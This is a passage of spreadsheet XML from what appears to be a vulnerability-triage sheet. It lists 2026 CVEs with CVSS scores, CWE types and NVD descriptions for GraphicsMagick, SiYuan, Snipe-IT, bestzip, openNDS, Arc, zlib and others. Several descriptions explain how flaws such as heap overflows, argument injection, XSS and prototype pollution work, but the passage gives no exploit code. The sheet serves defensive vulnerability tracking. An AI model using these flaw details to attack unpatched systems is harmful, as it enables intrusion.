          <t>An issue in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the src/media_tools/dvb_mpe.c, descriptorTime_slice_fec_identifier() and gf_m2ts_ipdatagram_reader() components. Fixed in 0e4093392e1f847c90d20e031e893cd942fef938.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71614</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77118</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>22e2d327-25fe-45d7-9f0c-dcd23b7108df</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds write exists in the Photo CD (PCD) decoder of GraphicsMagick. In DecodeImage() (coders/pcd.c), the Huffman delta loop advances its output pointer with q++ after every decoded delta and never checks it against the end of the heap-allocated luma/chroma plane buffers. The pointer is repositioned only when a sync marker introduces a new plane/row; between sync markers the run length is bounded solely by the input.
A crafted PCD file that positions the pointer near the end of a plane and then supplies a long run of deltas with no intervening sync therefore walks the pointer past the end of the allocation and writes through it. Processing an untrusted PCD file — for example with gm convert or gm identify, or through any application linked against libGraphicsMagick — can corrupt heap memory beyond the buffers.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77118</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82563</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>An attacker could impersonate the camera and place themselves in a man-in-the-middle or device-emulation position. This permits manipulation of device status responses, observation of application requests, and potential triggering of firmware-update behavior.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82563</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86502</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing TLS and authentication on the IJent gRPC server allowed local code execution on Remote Development hosts</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86502</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86741</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to sanitize the category EULA text field before rendering it in checkout confirmation emails. Attackers with low-privilege permissions can inject markdown image syntax or raw HTML img tags pointing to local files or remote URLs, which the mail auto-embed library resolves server-side and returns as email attachments, exfiltrating sensitive files like .env credentials and enabling SSRF attacks.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86741</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87794</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>bestzip versions 2.2.6 and 3.0.2 contain an argument injection vulnerability in the nativeZip function that allows attackers to inject arbitrary arguments to the Info-ZIP backend. Attackers can supply a malicious destination path combined with crafted source entries to execute arbitrary commands with Node.js process privileges. Fixed in 2.2.7 and 3.0.3.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87794</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87811</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 inserts persisted notebook template paths into HTML input value attributes without proper attribute encoding. Attackers can craft malicious template paths that break out of the attribute context and execute JavaScript when a victim opens notebook configuration, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87811</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87813</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>SiYuan before v3.8.2 contains a stored cross-site scripting vulnerability in the Search Assets result list where asset filenames are interpolated into HTML without escaping. Authenticated attackers can craft asset filenames containing malicious markup that executes JavaScript in the victim's browser when searching assets, enabling same-origin API requests and application state manipulation.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87813</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87815</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain a path traversal vulnerability in the /api/riff/removeRiffDeck endpoint that fails to validate the deckID parameter. An authenticated administrator can supply path traversal sequences to delete arbitrary .deck and .cards files outside the workspace directory.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87815</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29988</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>A cleartext transmission of sensitive information vulnerability in the NFC interface of multiple Milesight IoT device models running affected firmware versions allows an unauthenticated attacker with physical proximity to retrieve LoRaWAN ABP NwkSKey and AppSKey values and D2D keys via an NFC read operation. The exposed keys can be used to decrypt LoRaWAN traffic, forge uplink and downlink frames, submit falsified sensor data, issue supported device commands, and cause subsequent legitimate frames to be rejected.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29988</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38820</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>openNDS before 11.0.0 is susceptible to unauthenticated OS command execution via shell command injection through the fas query parameter on the /opennds_preauth/ endpoint because of libopennds.sh.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38820</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45730</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.0, there is a vulnerability in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass OPA authorization checks on write paths (PUT /api/projects/{id}, DELETE /api/projects) and modify or delete any project along with all its associated resources (functions, API gateways, etc.). This issue has been patched in version 1.16.0.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45730</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48105</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-345, CWE-913</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's Raft FSM (`internal/cluster/raft/fsm.go:applyRegisterFile`) accepts attacker-chosen file paths in manifest-registration proposals without validating them against the configured storage backend. The only check is that the path is non-empty. There is no parent-traversal (`..`) rejection, no allowlist of legitimate prefixes, no scheme restriction (`s3://` vs local), and no length bound. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit the cluster manifest for unexpected paths (any path not matching the configured storage backend root is suspect), and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48105</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48106</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-345, CWE-924</t>
        </is>
      </c>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's cluster replication receiver at `internal/cluster/replication/receiver.go` validates only the wire-format envelope (length, opcode) of inbound messages. The `MsgReplicateSync` payload itself is accepted without any application-layer authentication — no HMAC, no signature, no per-message nonce. The replication stream is protected at the transport layer by TLS / mTLS, but there is no protection against application-layer message tampering or replay once a peer is on the cluster network. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit replication logs for unexpected `MsgReplicateSync` traffic, and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48106</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53507</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>oasdiff-action is a GitHub Action that detects breaking changes in OpenAPI specs and post a review on every pull request. Before version 0.0.51, the oasdiff actions resolved external $refs in the OpenAPI spec by default (allow-external-refs: true). When an action runs on a pull request whose spec is attacker-controlled — most importantly fork pull requests on public repositories — a $ref in that spec is fetched/read on the runner with no interaction required, enabling SSRF and disclosure of structured files on the runner. This issue has been patched in version 0.0.51.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53507</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82404</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>TOON is a compact, human-readable serialization of JSON data for LLM prompts. Prior to 2.3.1, decoding attacker-controlled TOON with a __proto__, constructor, or prototype key wrote through the object prototype chain instead of creating an own property, polluting Object.prototype for the runtime. In packages/toon/src/decode/expand.ts, the expandPaths: 'safe' path and insertPathSafe function made dotted keys such as a.__proto__.x the strongest vector, while plain nested objects, tabular rows, quoted keys, and streaming decode were also affected. The encoder also dropped own __proto__ properties and could invoke an inherited setter during normalization. Services that decode untrusted TOON could experience denial of service or, when a suitable downstream gadget is present, remote code execution. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82404</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85091</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>zlib versions 1.3.1.2 through 1.3.2 contain a heap buffer overflow vulnerability in the gz_vacate() function when processing non-blocking gzwrite() operations with stale external buffer pointers. Attackers can trigger the overflow by calling gzprintf() or gzvprintf() after a write stall, causing an unchecked memmove() to write beyond the internal input buffer boundary.</t>
